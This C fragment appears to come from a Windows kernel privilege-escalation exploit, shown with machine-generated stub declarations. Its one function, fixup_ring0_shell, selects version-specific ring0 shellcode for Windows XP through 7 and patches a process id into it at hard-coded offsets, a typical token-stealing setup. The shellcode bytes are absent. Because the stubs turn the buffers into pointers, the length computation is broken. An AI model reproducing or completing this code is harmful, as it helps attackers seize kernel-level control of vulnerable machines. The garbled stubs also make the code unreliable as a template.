
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int* PDWORD ;
typedef int * PCHAR ;
typedef int DWORD ;


 int EXIT_FAILURE ;
 int GetVersion () ;
 scalar_t__ HIBYTE (int ) ;
 scalar_t__ LOBYTE (int ) ;
 int LOWORD (int) ;
 int exit (int ) ;
 int printf (char*,...) ;
 int * win2k3_ring0_shell ;
 int * win7_ring0_shell ;
 int * winvista_ring0_shell ;
 int * winxp_ring0_shell ;

__attribute__((used)) static PCHAR fixup_ring0_shell (DWORD ppid, DWORD *zlen)
{
 DWORD dwVersion, dwMajorVersion, dwMinorVersion;

 dwVersion = GetVersion ();
 dwMajorVersion = (DWORD) (LOBYTE(LOWORD(dwVersion)));
 dwMinorVersion = (DWORD) (HIBYTE(LOWORD(dwVersion)));

 printf("dwMajorVersion = %d dwMinorVersion %d\n", dwMajorVersion, dwMinorVersion);

 switch (dwMajorVersion)
 {
  case 5:
   switch (dwMinorVersion)
   {
    case 1:
     *zlen = sizeof winxp_ring0_shell - 1;
     *(PDWORD) &winxp_ring0_shell[55] = ppid;
     return (winxp_ring0_shell);

    case 2:
     *zlen = sizeof win2k3_ring0_shell - 1;
     *(PDWORD) &win2k3_ring0_shell[58] = ppid;
     return (win2k3_ring0_shell);

    default:
     printf("GetVersion, unsupported version\n");
     exit(EXIT_FAILURE);
   }

  case 6:
   switch (dwMinorVersion)
   {
    case 0:
     *zlen = sizeof winvista_ring0_shell - 1;
     *(PDWORD) &winvista_ring0_shell[54] = ppid;
     return (winvista_ring0_shell);

    case 1:
     *zlen = sizeof win7_ring0_shell - 1;
     *(PDWORD) &win7_ring0_shell[54] = ppid;
     return (win7_ring0_shell);

    default:
     printf("GetVersion, unsupported version\n");
     exit(EXIT_FAILURE);
   }

  default:
   printf("GetVersion, unsupported version\n");
   exit(EXIT_FAILURE);
 }

 return (((void*)0));
}
